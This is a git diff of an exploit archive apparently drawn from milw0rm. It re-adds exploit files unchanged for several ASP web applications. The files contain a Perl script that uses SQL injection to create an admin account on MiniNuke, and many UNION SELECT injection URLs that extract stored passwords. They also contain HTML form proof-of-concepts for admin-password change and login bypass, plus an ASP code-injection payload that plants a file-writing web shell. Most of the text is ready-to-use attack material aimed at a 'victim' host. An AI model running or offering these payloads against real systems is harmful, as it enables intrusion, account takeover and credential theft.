advisory: http://www.nukedx.com/?viewdoc=31 -#Usage: mini.pl -use IO::Socket; -if(@ARGV != 5) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-31\r\n"; - print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to MiniNuke ex: /mininuke/\r\n"; - print "- -> Desired username to create ex: h4x0r\r\n"; - print "- -> Password for our username ex: p4ZZw0rd\r\n"; - print "- -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $mnserver = $ARGV[0]; - $mnserver =~ s/(http:\/\/)//eg; - $mnhost = "http://".$mnserver; - $mndir = $ARGV[1]; - $mnuser = $ARGV[2]; - $mnpass = $ARGV[3]; - $mnmail = $ARGV[4]; - $mnport = "80"; - #Sending data... - header(); - print "- Trying to connect: $mnserver\r\n"; - getsession(); -} -sub getsession () -{ - print "- Getting session for register...\r\n"; - $mnstar = "membership.asp?action=new"; - $mnsreq = $mnhost.$mndir.$mnstar; - $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; - print $mns "GET $mnsreq HTTP/1.1\n"; - print $mns "Accept: */*\n"; - print $mns "Referer: $mnhost\n"; - print $mns "Accept-Language: tr\n"; - print $mns "User-Agent: NukeZilla\n"; - print $mns "Cache-Control: no-cache\n"; - print $mns "Host: $mnserver\n"; - print $mns "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$mns>) { - if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; } - if ($answer =~ /Güvenlik Kodunuz<\/td>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); } - } - #if you are here... - die "- Exploit failed\r\n"; -} -sub doregister () -{ - close($mns); - $mntar = "membership.asp?action=register"; - $mnreq = $mnhost.$mndir.$mntar; - print "- Session getting done\r\n"; - print "- Lets create our user...\r\n"; - $mndata = "kuladi=".$mnuser; - $mndata.= "&password=".$mnpass; - $mndata.= "&email=".$mnmail; - $mndata.= "&isim=h4x0r"; - $mndata.= "&g_soru=whooooo"; - $mndata.= "&g_cevap=h4x0rs"; - $mndata.= "&icq=1"; - $mndata.= "&msn=1"; - $mndata.= "&aim=1"; - $mndata.= "&sehir=1"; - $mndata.= "&meslek=1"; - $mndata.= "&cinsiyet=b"; - $mndata.= "&yas_1=1"; - $mndata.= "&yas_2=1"; - $mndata.= "&yas_3=1920"; - $mndata.= "&web=http://www.milw0rm.com"; - $mndata.= "&imza=h4x0r"; - $mndata.= "&mavatar=IMAGES/avatars/1.gif"; - $mndata.= "&security_code=".$mngvn; - $mndata.= "&mail_goster=on"; - $mndatalen = length($mndata); - $mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; - print $mn "POST $mnreq HTTP/1.1\r\n"; - print $mn "Accept: */*\r\n"; - print $mn "Referer: $mnhost\r\n"; - print $mn "Accept-Language: tr\r\n"; - print $mn "Content-Type: application/x-www-form-urlencoded\r\n"; - print $mn "Accept-Encoding: gzip, deflate\r\n"; - print $mn "User-Agent: NukeZilla\r\n"; - print $mn "Cookie: $mncookie\r\n"; - print $mn "Host: $mnserver\r\n"; - print $mn "Content-length: $mndatalen\r\n"; - print $mn "Connection: Keep-Alive\r\n"; - print $mn "Cache-Control: no-cache\r\n\r\n"; - print $mn $mndata; - print $mn "\r\n\r\n"; - while ($answer = <$mn>) { - if ($answer =~ /Tebrikler !!!/) { - print "- Creating user has been done...\r\n"; - print "- Loginning in to user...\r\n"; - dologin(); - } - } - #if you are here... - die "- Exploit failed\r\n"; -} -sub dologin () -{ - close ($mn); - $mnltar = "enter.asp"; - $mnlreq = $mnhost.$mndir.$mnltar; - $mnldata = "kuladi=".$mnuser; - $mnldata.= "&password=".$mnpass; - $mnldata.= "&guvenlik=423412"; - $mnldata.= "&gguvenlik=423412"; - $mnldatalen = length($mnldata); - $mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; - print $mnl "POST $mnlreq HTTP/1.1\r\n"; - print $mnl "Accept: */*\r\n"; - print $mnl "Referer: $mnhost\r\n"; - print $mnl "Accept-Language: tr\r\n"; - print $mnl "Content-Type: application/x-www-form-urlencoded\r\n"; - print $mnl "Accept-Encoding: gzip, deflate\r\n"; - print $mnl "User-Agent: NukeZilla\r\n"; - print $mnl "Host: $mnserver\r\n"; - print $mnl "Content-length: $mnldatalen\r\n"; - print $mnl "Connection: Keep-Alive\r\n"; - print $mnl "Cache-Control: no-cache\r\n\r\n"; - print $mnl $mnldata; - print $mnl "\r\n\r\n"; - while ($answer = <$mnl>) { - if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; } - if ($answer =~ /Cache-control:/) { doadmin(); } - } - #if you are here... - die "- Exploit failed\r\n"; -} -sub doadmin () -{ - close($mnl); - print "- Editing profile..\r\n"; - $mnptar = "Your_Account.asp?op=UpdateProfile"; - $mnpreq = $mnhost.$mndir.$mnptar; - $mnpdata.= "email=".$mnmail; - $mnpdata.= "&isim=h4x0r"; - $mnpdata.= "&g_soru=whooooo"; - $mnpdata.= "&g_cevap=h4x0rs"; - $mnpdata.= "&icq=1"; - $mnpdata.= "&msn=1"; - $mnpdata.= "&aim=1"; - $mnpdata.= "&sehir=1"; - $mnpdata.= "&meslek=1"; - $mnpdata.= "&cinsiyet=b"; - $mnpdata.= "&yas_1=1"; - $mnpdata.= "&yas_2=1"; - $mnpdata.= "&yas_3=1920',seviye='1"; - $mnpdata.= "&web=http://www.milw0rm.com"; - $mnpdata.= "&imza=h4x0r"; - $mnpdata.= "&mavatar=IMAGES/avatars/1.gif"; - $mnpdata.= "&mail_goster=on"; - $mnpdatalen = length($mnpdata); - $mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; - print $mnp "POST $mnpreq HTTP/1.1\r\n"; - print $mnp "Accept: */*\r\n"; - print $mnp "Referer: $mnhost\r\n"; - print $mnp "Accept-Language: tr\r\n"; - print $mnp "Content-Type: application/x-www-form-urlencoded\r\n"; - print $mnp "Accept-Encoding: gzip, deflate\r\n"; - print $mnp "User-Agent: NukeZilla\r\n"; - print $mnp "Cookie: $mnlcookie\r\n"; - print $mnp "Host: $mnserver\r\n"; - print $mnp "Content-length: $mnpdatalen\r\n"; - print $mnp "Connection: Keep-Alive\r\n"; - print $mnp "Cache-Control: no-cache\r\n\r\n"; - print $mnp $mnpdata; - print $mn "\r\n\r\n"; - while ($answer = <$mnp>) { - if ($answer =~ /Tebrikler !!!/) { - print "- Editing profile been done...\r\n"; - print "- Exploiting finished succesfully\r\n"; - print "- Your username $mnuser has been created as admin\r\n"; - print "- You can login with password $mnpass on $mnlreq\r\n"; - exit(); - } - if ($answer =~ /Üyeler Açýktýr/) { - print "- Exploit failed\r\n"; - exit(); - } - } - #if you are here... - die "- Exploit failed\r\n"; -} -# nukedx.com [2006-05-27] - -# milw0rm.com [2006-05-27] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=31 +#Usage: mini.pl +use IO::Socket; +if(@ARGV != 5) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-31\r\n"; + print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to MiniNuke ex: /mininuke/\r\n"; + print "- -> Desired username to create ex: h4x0r\r\n"; + print "- -> Password for our username ex: p4ZZw0rd\r\n"; + print "- -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n"; + exit(); +} +sub exploit () +{ + #Our variables... + $mnserver = $ARGV[0]; + $mnserver =~ s/(http:\/\/)//eg; + $mnhost = "http://".$mnserver; + $mndir = $ARGV[1]; + $mnuser = $ARGV[2]; + $mnpass = $ARGV[3]; + $mnmail = $ARGV[4]; + $mnport = "80"; + #Sending data... + header(); + print "- Trying to connect: $mnserver\r\n"; + getsession(); +} +sub getsession () +{ + print "- Getting session for register...\r\n"; + $mnstar = "membership.asp?action=new"; + $mnsreq = $mnhost.$mndir.$mnstar; + $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; + print $mns "GET $mnsreq HTTP/1.1\n"; + print $mns "Accept: */*\n"; + print $mns "Referer: $mnhost\n"; + print $mns "Accept-Language: tr\n"; + print $mns "User-Agent: NukeZilla\n"; + print $mns "Cache-Control: no-cache\n"; + print $mns "Host: $mnserver\n"; + print $mns "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$mns>) { + if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; } + if ($answer =~ /Güvenlik Kodunuz<\/td>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); } + } + #if you are here... + die "- Exploit failed\r\n"; +} +sub doregister () +{ + close($mns); + $mntar = "membership.asp?action=register"; + $mnreq = $mnhost.$mndir.$mntar; + print "- Session getting done\r\n"; + print "- Lets create our user...\r\n"; + $mndata = "kuladi=".$mnuser; + $mndata.= "&password=".$mnpass; + $mndata.= "&email=".$mnmail; + $mndata.= "&isim=h4x0r"; + $mndata.= "&g_soru=whooooo"; + $mndata.= "&g_cevap=h4x0rs"; + $mndata.= "&icq=1"; + $mndata.= "&msn=1"; + $mndata.= "&aim=1"; + $mndata.= "&sehir=1"; + $mndata.= "&meslek=1"; + $mndata.= "&cinsiyet=b"; + $mndata.= "&yas_1=1"; + $mndata.= "&yas_2=1"; + $mndata.= "&yas_3=1920"; + $mndata.= "&web=http://www.milw0rm.com"; + $mndata.= "&imza=h4x0r"; + $mndata.= "&mavatar=IMAGES/avatars/1.gif"; + $mndata.= "&security_code=".$mngvn; + $mndata.= "&mail_goster=on"; + $mndatalen = length($mndata); + $mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; + print $mn "POST $mnreq HTTP/1.1\r\n"; + print $mn "Accept: */*\r\n"; + print $mn "Referer: $mnhost\r\n"; + print $mn "Accept-Language: tr\r\n"; + print $mn "Content-Type: application/x-www-form-urlencoded\r\n"; + print $mn "Accept-Encoding: gzip, deflate\r\n"; + print $mn "User-Agent: NukeZilla\r\n"; + print $mn "Cookie: $mncookie\r\n"; + print $mn "Host: $mnserver\r\n"; + print $mn "Content-length: $mndatalen\r\n"; + print $mn "Connection: Keep-Alive\r\n"; + print $mn "Cache-Control: no-cache\r\n\r\n"; + print $mn $mndata; + print $mn "\r\n\r\n"; + while ($answer = <$mn>) { + if ($answer =~ /Tebrikler !!!/) { + print "- Creating user has been done...\r\n"; + print "- Loginning in to user...\r\n"; + dologin(); + } + } + #if you are here... + die "- Exploit failed\r\n"; +} +sub dologin () +{ + close ($mn); + $mnltar = "enter.asp"; + $mnlreq = $mnhost.$mndir.$mnltar; + $mnldata = "kuladi=".$mnuser; + $mnldata.= "&password=".$mnpass; + $mnldata.= "&guvenlik=423412"; + $mnldata.= "&gguvenlik=423412"; + $mnldatalen = length($mnldata); + $mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; + print $mnl "POST $mnlreq HTTP/1.1\r\n"; + print $mnl "Accept: */*\r\n"; + print $mnl "Referer: $mnhost\r\n"; + print $mnl "Accept-Language: tr\r\n"; + print $mnl "Content-Type: application/x-www-form-urlencoded\r\n"; + print $mnl "Accept-Encoding: gzip, deflate\r\n"; + print $mnl "User-Agent: NukeZilla\r\n"; + print $mnl "Host: $mnserver\r\n"; + print $mnl "Content-length: $mnldatalen\r\n"; + print $mnl "Connection: Keep-Alive\r\n"; + print $mnl "Cache-Control: no-cache\r\n\r\n"; + print $mnl $mnldata; + print $mnl "\r\n\r\n"; + while ($answer = <$mnl>) { + if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; } + if ($answer =~ /Cache-control:/) { doadmin(); } + } + #if you are here... + die "- Exploit failed\r\n"; +} +sub doadmin () +{ + close($mnl); + print "- Editing profile..\r\n"; + $mnptar = "Your_Account.asp?op=UpdateProfile"; + $mnpreq = $mnhost.$mndir.$mnptar; + $mnpdata.= "email=".$mnmail; + $mnpdata.= "&isim=h4x0r"; + $mnpdata.= "&g_soru=whooooo"; + $mnpdata.= "&g_cevap=h4x0rs"; + $mnpdata.= "&icq=1"; + $mnpdata.= "&msn=1"; + $mnpdata.= "&aim=1"; + $mnpdata.= "&sehir=1"; + $mnpdata.= "&meslek=1"; + $mnpdata.= "&cinsiyet=b"; + $mnpdata.= "&yas_1=1"; + $mnpdata.= "&yas_2=1"; + $mnpdata.= "&yas_3=1920',seviye='1"; + $mnpdata.= "&web=http://www.milw0rm.com"; + $mnpdata.= "&imza=h4x0r"; + $mnpdata.= "&mavatar=IMAGES/avatars/1.gif"; + $mnpdata.= "&mail_goster=on"; + $mnpdatalen = length($mnpdata); + $mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; + print $mnp "POST $mnpreq HTTP/1.1\r\n"; + print $mnp "Accept: */*\r\n"; + print $mnp "Referer: $mnhost\r\n"; + print $mnp "Accept-Language: tr\r\n"; + print $mnp "Content-Type: application/x-www-form-urlencoded\r\n"; + print $mnp "Accept-Encoding: gzip, deflate\r\n"; + print $mnp "User-Agent: NukeZilla\r\n"; + print $mnp "Cookie: $mnlcookie\r\n"; + print $mnp "Host: $mnserver\r\n"; + print $mnp "Content-length: $mnpdatalen\r\n"; + print $mnp "Connection: Keep-Alive\r\n"; + print $mnp "Cache-Control: no-cache\r\n\r\n"; + print $mnp $mnpdata; + print $mn "\r\n\r\n"; + while ($answer = <$mnp>) { + if ($answer =~ /Tebrikler !!!/) { + print "- Editing profile been done...\r\n"; + print "- Exploiting finished succesfully\r\n"; + print "- Your username $mnuser has been created as admin\r\n"; + print "- You can login with password $mnpass on $mnlreq\r\n"; + exit(); + } + if ($answer =~ /Üyeler Açýktýr/) { + print "- Exploit failed\r\n"; + exit(); + } + } + #if you are here... + die "- Exploit failed\r\n"; +} +# nukedx.com [2006-05-27] + +# milw0rm.com [2006-05-27] diff --git a/platforms/asp/webapps/1840.txt b/platforms/asp/webapps/1840.txt index 2543a5b5d..ff103a94d 100755 --- a/platforms/asp/webapps/1840.txt +++ b/platforms/asp/webapps/1840.txt @@ -1,25 +1,25 @@ -Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities -Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com -This exploits works on Enigma Haber <= 4.3 -Original advisory can be found at: http://www.nukedx.com/?viewdoc=34 -http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586 -http://[site]/enigmadir/yazdir.asp?hid=SQL -http://[site]/enigmadir/yorum.asp?hid=SQL -http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1 -http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00 -http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00 -http://[site]/enigmadir/haber_devam.asp?id=SQL -Examples in the below needs admin rights. -http://[site]/enigmadir/admin/y_admin.asp?yid=SQL -http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664 -http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL -http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL -http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL -http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL -http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL -http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL -http://[site]/enigmadir/admin/admin_sil.asp?id=SQL - -# nukedx.com [2006-05-27] - -# milw0rm.com [2006-05-28] +Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities +Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com +This exploits works on Enigma Haber <= 4.3 +Original advisory can be found at: http://www.nukedx.com/?viewdoc=34 +http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586 +http://[site]/enigmadir/yazdir.asp?hid=SQL +http://[site]/enigmadir/yorum.asp?hid=SQL +http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1 +http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00 +http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00 +http://[site]/enigmadir/haber_devam.asp?id=SQL +Examples in the below needs admin rights. +http://[site]/enigmadir/admin/y_admin.asp?yid=SQL +http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664 +http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL +http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL +http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL +http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL +http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL +http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL +http://[site]/enigmadir/admin/admin_sil.asp?id=SQL + +# nukedx.com [2006-05-27] + +# milw0rm.com [2006-05-28] diff --git a/platforms/asp/webapps/1845.txt b/platforms/asp/webapps/1845.txt index b9baea21c..914bbc0f5 100755 --- a/platforms/asp/webapps/1845.txt +++ b/platforms/asp/webapps/1845.txt @@ -1,15 +1,15 @@ -ASPSitem <= 2.0 Multiple Vulnerabilities. -Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com -This exploits works on ASPSitem <= 2.0. -Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 -SQL injection -> -GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] -EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 -id%20like%201 -with this example remote attacker can leak userid 1's login information from database. -Read others private messages -> -GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername - -# nukedx.com [2006-05-27] - -# milw0rm.com [2006-05-28] +ASPSitem <= 2.0 Multiple Vulnerabilities. +Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com +This exploits works on ASPSitem <= 2.0. +Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 +SQL injection -> +GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] +EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 +id%20like%201 +with this example remote attacker can leak userid 1's login information from database. +Read others private messages -> +GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername + +# nukedx.com [2006-05-27] + +# milw0rm.com [2006-05-28] diff --git a/platforms/asp/webapps/1849.htm b/platforms/asp/webapps/1849.htm index 079583459..303ca922f 100755 --- a/platforms/asp/webapps/1849.htm +++ b/platforms/asp/webapps/1849.htm @@ -1,69 +1,69 @@ - - -

-
-Speedy Forum User Pass Change // -ajann

User -Name -: - - Example: Surname -Name
-User -Mail -: - - Example: -mail@domain.com
- -User -Ýd -: - - Example: Ýd:1 -Admin
-User Country : - - - Example: -Turkey
- - - -User -Pass - -: - - - Example: 123456
- -User -RePass -: - - - Example: 123456
- -Form Action : - - - - - Example: -http://[target]/[path]/profileupdate.asp

- -

- -

- -
- -
- -
- -# milw0rm.com [2006-05-29] + + +
+
+Speedy Forum User Pass Change // +ajann

User +Name +: + + Example: Surname +Name
+User +Mail +: + + Example: +mail@domain.com
+ +User +Ýd +: + + Example: Ýd:1 +Admin
+User Country : + + + Example: +Turkey
+ + + +User +Pass + +: + + + Example: 123456
+ +User +RePass +: + + + Example: 123456
+ +Form Action : + + + + + Example: +http://[target]/[path]/profileupdate.asp

+ +

+ +

+ +
+ +
+ +
+ +# milw0rm.com [2006-05-29] diff --git a/platforms/asp/webapps/1850.htm b/platforms/asp/webapps/1850.htm index 588b830cc..97f64c30e 100755 --- a/platforms/asp/webapps/1850.htm +++ b/platforms/asp/webapps/1850.htm @@ -1,43 +1,43 @@ -################ KAPDA - Security Science Researchers Institute ################# -#Advisory : http://www.kapda.ir/advisory-337.html -#Vendor : http://www.nukedit.com/ -#What is : Nukedit is a Free Content Management -#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable! -#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir -#Vulnerabale versions : <= 4.9.6 -#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com -#Solution : update to new version of nukedit . -#Change "http://victim.com/nukedit/utilities/register.asp" -################ KAPDA - Security Science Researchers Institute ################# - -Kapda HTML PoC For Nukedit <= 4.9.6 - - -
-Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit
-Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir
-Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"
-Fill the blank and submit . After that login with your email ! + your password .

-

-

-


Username : - - - - - - - - -


Your E-mail : -


Your Password : - - -



- - -
- - - -# milw0rm.com [2006-05-29] +################ KAPDA - Security Science Researchers Institute ################# +#Advisory : http://www.kapda.ir/advisory-337.html +#Vendor : http://www.nukedit.com/ +#What is : Nukedit is a Free Content Management +#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable! +#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir +#Vulnerabale versions : <= 4.9.6 +#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com +#Solution : update to new version of nukedit . +#Change "http://victim.com/nukedit/utilities/register.asp" +################ KAPDA - Security Science Researchers Institute ################# + +Kapda HTML PoC For Nukedit <= 4.9.6 + + +
+Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit
+Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir
+Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"
+Fill the blank and submit . After that login with your email ! + your password .

+

+

+


Username : + + + + + + + + +


Your E-mail : +


Your Password : + + +



+ + +
+ + + +# milw0rm.com [2006-05-29] diff --git a/platforms/asp/webapps/1859.htm b/platforms/asp/webapps/1859.htm index cb981fdf2..a33e4d4a4 100755 --- a/platforms/asp/webapps/1859.htm +++ b/platforms/asp/webapps/1859.htm @@ -1,79 +1,79 @@ - - - -AspWebLink 2.0 Remote Admin Pass Change Exploit -
Administrative -Password:
Number of Days -New:
Number of Visits Hot:
Links Per Page:
Category Header:
Category -Columns:
Sub -Category Header:
Show Category -Description:YESNO
Show Whats New on -home page:YESNO
Number of New -items on home page:
Show Whats Hot on home page:YESNO
Require approval for link and review -additions:YESNO
Number of Hot -items on home page:
Whats New Header:
Whats Hot Header:
Sort Links -By:
- -# milw0rm.com [2006-06-01] + + + +AspWebLink 2.0 Remote Admin Pass Change Exploit +
Administrative +Password:
Number of Days +New:
Number of Visits Hot:
Links Per Page:
Category Header:
Category +Columns:
Sub +Category Header:
Show Category +Description:YESNO
Show Whats New on +home page:YESNO
Number of New +items on home page:
Show Whats Hot on home page:YESNO
Require approval for link and review +additions:YESNO
Number of Hot +items on home page:
Whats New Header:
Whats Hot Header:
Sort Links +By:
+ +# milw0rm.com [2006-06-01] diff --git a/platforms/asp/webapps/1873.txt b/platforms/asp/webapps/1873.txt index 3d628ea16..a5918b9ed 100755 --- a/platforms/asp/webapps/1873.txt +++ b/platforms/asp/webapps/1873.txt @@ -1,8 +1,8 @@ -# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability -# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded -# Exploited by FarhadKey from kapda.ir - -Exploit : -http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE - -# milw0rm.com [2006-06-03] +# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability +# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded +# Exploited by FarhadKey from kapda.ir + +Exploit : +http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE + +# milw0rm.com [2006-06-03] diff --git a/platforms/asp/webapps/1884.htm b/platforms/asp/webapps/1884.htm index df819487f..33a28c710 100755 --- a/platforms/asp/webapps/1884.htm +++ b/platforms/asp/webapps/1884.htm @@ -1,12 +1,12 @@ - -

KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit


change action in source and then submit -
- - -



- -
www.kapda.ir
-
- - -# milw0rm.com [2006-06-06] + +

KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit


change action in source and then submit +
+ + +



+ +
www.kapda.ir
+
+ + +# milw0rm.com [2006-06-06] diff --git a/platforms/asp/webapps/1900.txt b/platforms/asp/webapps/1900.txt index e298df0d3..701e93712 100755 --- a/platforms/asp/webapps/1900.txt +++ b/platforms/asp/webapps/1900.txt @@ -12,5 +12,5 @@ #Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20',email,'
','Þifre:%20',sifre,'')+from+uye+ORDER BY email ASC # nukedx.com [2006-06-11] - -# milw0rm.com [2006-06-11] + +# milw0rm.com [2006-06-11] diff --git a/platforms/asp/webapps/1930.txt b/platforms/asp/webapps/1930.txt index 786e89e71..3347e4a1e 100755 --- a/platforms/asp/webapps/1930.txt +++ b/platforms/asp/webapps/1930.txt @@ -1,9 +1,9 @@ -# There is Sql injection WeBBoA Host Script v1.1 -# Risk=High - -# Exploit: -http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1 - -# Credit: EntriKa - -# milw0rm.com [2006-06-19] +# There is Sql injection WeBBoA Host Script v1.1 +# Risk=High + +# Exploit: +http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1 + +# Credit: EntriKa + +# milw0rm.com [2006-06-19] diff --git a/platforms/asp/webapps/1931.txt b/platforms/asp/webapps/1931.txt index 28fe0c5d9..6d61cd377 100755 --- a/platforms/asp/webapps/1931.txt +++ b/platforms/asp/webapps/1931.txt @@ -1,51 +1,51 @@ -/*------------------------------------------------ - IHS Public advisory --------------------------------------------------*/ - -ASP Stats Generator SQL-ASP injection - Code Excution -ASP Stats Generator is a powerful website counter, completely written in ASP programming language. -The application is able to track web site activity generating graphical and statistical reports. -It combines a server side class with a javascript system to get a wide range of visitors' details. -http://www.weppos.com - -Credit: -The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY) -The original article can be found at: - -http://www.IHSteam.com -http://www.hamid.ir/security/ - - -Vulnerable Systems: -ASP Stats Generator 2.1.1 - 2.1 and below - -SQL injection : - -Example : -The following URL can be used to trigger an SQL injection vulnerability in the pages.asp: -http://localhost/myasg/pages.asp?order='&mese=1 - -Microsoft JET Database Engine error '80040e14' -Syntax error in string in query expression 'SUM(Visits) ''. -/myasg/pages.asp, line 236 - -Exploit : - -http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1 - - -ASP Code Injection : -Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp". -This can be exploited to inject arbitrary ASP code. - -Exploit : - -#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.
" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.
" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "
" ): f.Write( content ): response.Write( err.Description & "
" ): f.close: end if %><%=filename%>
<%=path%>
<%= Request("path") %>

Upload File

